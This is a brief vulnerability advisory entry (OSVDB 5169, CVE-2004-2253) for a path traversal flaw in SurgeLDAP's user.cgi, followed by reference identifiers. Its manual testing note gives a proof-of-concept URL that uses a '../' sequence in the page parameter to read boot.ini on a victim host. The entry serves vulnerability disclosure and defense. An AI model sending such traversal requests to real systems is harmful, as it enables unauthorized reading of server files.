SurgeLDAP user.cgi page Variable Traversal Arbitrary File Access

2004-04-11T14:03:29
ID OSVDB:5169
Type osvdb
Reporter OSVDB
Modified 2004-04-11T14:03:29

Description

Manual Testing Notes

http://[victim]:6680/user.cgi?cmd=show&page=/../../../boot.ini

References:

Security Tracker: 1009732 Secunia Advisory ID:11343 Other Advisory URL: http://members.lycos.co.uk/r34ct/main/SurgeLDAP%201.0g.txt ISS X-Force ID: 15851 CVE-2004-2253 Bugtraq ID: 10103